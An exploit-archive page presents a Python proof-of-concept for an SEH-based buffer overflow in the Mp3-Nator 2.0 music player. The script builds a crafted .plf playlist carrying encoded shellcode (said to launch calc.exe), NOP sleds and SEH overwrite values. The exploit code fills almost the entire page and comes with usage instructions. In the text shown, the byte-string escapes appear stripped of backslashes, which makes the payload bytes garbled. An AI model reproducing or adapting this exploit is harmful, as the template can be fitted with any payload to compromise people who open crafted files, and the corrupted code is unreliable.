Mp3-Nator 2.0 Buffer Overflow Exploit (SEH)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Mp3-Nator 2.0 Buffer Overflow Exploit (SEH)
# Published : 2010-11-11
# Author : C4SS!0 G0M3S
# Previous Title : IBM OmniFind Privilege Escalation Vulnerability
# Next Title : Realtek HD Audio Control Panel 2.1.3.2 Exploit

#!usr/bin/python
#
#Exploit Title: Exploit Buffer Overflow MP3-Nator
#Date: 10112010
#Author: C4SS!0 G0M3S
#Software Link: http://www.brothersoft.com/d.php?soft_id=16524&url=http%3A%2F%2Ffiles.brothersoft.com%2Fmp3_audio%2Fplayers%2Fmp3nator.zip
#Version: 2.0
#Tested on: WIN-XP SP3
#
#
#Writted By C4SS!0 G0M3S
#
#Home: http://wwww.google.com.br
#
#
#E-mail: Louredo_@hotmail.com
#
#
import os,sys

def layout():
    os.system("cls")
    os.system("color 4f")
    print("n[+]Exploit    :    Exploit Buffer Overflow MP3-NATOR v2.0")
    print("[+]Author     :    C4SS!0 G0M3S")
    print("[+]E-mail     :    Louredo_@hotmail.com")
    print("[+]Home       :    http://www.invasao.com.br")
    print("[+]Impact     :    Hich")
    print("[+]Version    :    2.0n")

if len(sys.argv)!=2:

    layout()
    print("[-]Usage: Exploit.py <File to Create>")
    print("[-]Exemple: Exploit.py musics.plfn")
    print("[-]Note: The Extension of the File Should be .plf for the Exploit Work")
    
else:
    #Exec The Calc.exe
    buffer = ("xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"
    "x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"
    "x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"
    "x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"
    "x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x44"
    "x42x30x42x50x42x30x4bx48x45x54x4ex43x4bx38x4ex47"  
    "x45x50x4ax57x41x30x4fx4ex4bx58x4fx54x4ax41x4bx38"
    "x4fx45x42x42x41x50x4bx4ex49x44x4bx38x46x33x4bx48"
    "x41x50x50x4ex41x53x42x4cx49x59x4ex4ax46x58x42x4c"
    "x46x57x47x30x41x4cx4cx4cx4dx30x41x30x44x4cx4bx4e"
    "x46x4fx4bx53x46x55x46x32x46x50x45x47x45x4ex4bx58"
    "x4fx45x46x52x41x50x4bx4ex48x56x4bx58x4ex50x4bx44"
    "x4bx48x4fx55x4ex41x41x30x4bx4ex4bx58x4ex41x4bx38"
    "x41x50x4bx4ex49x48x4ex45x46x32x46x50x43x4cx41x33"
    "x42x4cx46x46x4bx38x42x44x42x53x45x38x42x4cx4ax47"
    "x4ex30x4bx48x42x44x4ex50x4bx58x42x37x4ex51x4dx4a"
    "x4bx48x4ax36x4ax30x4bx4ex49x50x4bx38x42x58x42x4b"
    "x42x50x42x50x42x50x4bx38x4ax36x4ex43x4fx45x41x53"
    "x48x4fx42x46x48x35x49x38x4ax4fx43x48x42x4cx4bx57"
    "x42x45x4ax36x42x4fx4cx38x46x30x4fx35x4ax46x4ax39"
    "x50x4fx4cx38x50x50x47x55x4fx4fx47x4ex43x46x41x46"
    "x4ex46x43x36x42x50x5a")

    nseh="x90x90xebxf6"
    seh="x1axabx51x00"
    nops="x90" * 3000
    nops2="x90" * 760
    shell="xcc" * 600
    jmp="xe8x5bxfbxffxff" #Jmp From Start The My Shellcode 
    file=str(sys.argv[1])
    
    op="w"
    try:
        f=open(file,op)
        f.write(nops+buffer+nops2+jmp+nseh+seh+shell)
        f.close()
        layout()
        print("[+]Creating File: "+file)
        print("[+]Identifying Shellcode length")
        print("[+]The Length of Your Shellcode:"+str(len(buffer)))
        print("[+]File "+file+" Created Successfully")
    except IOError:
        print("[+]Error in Create The File")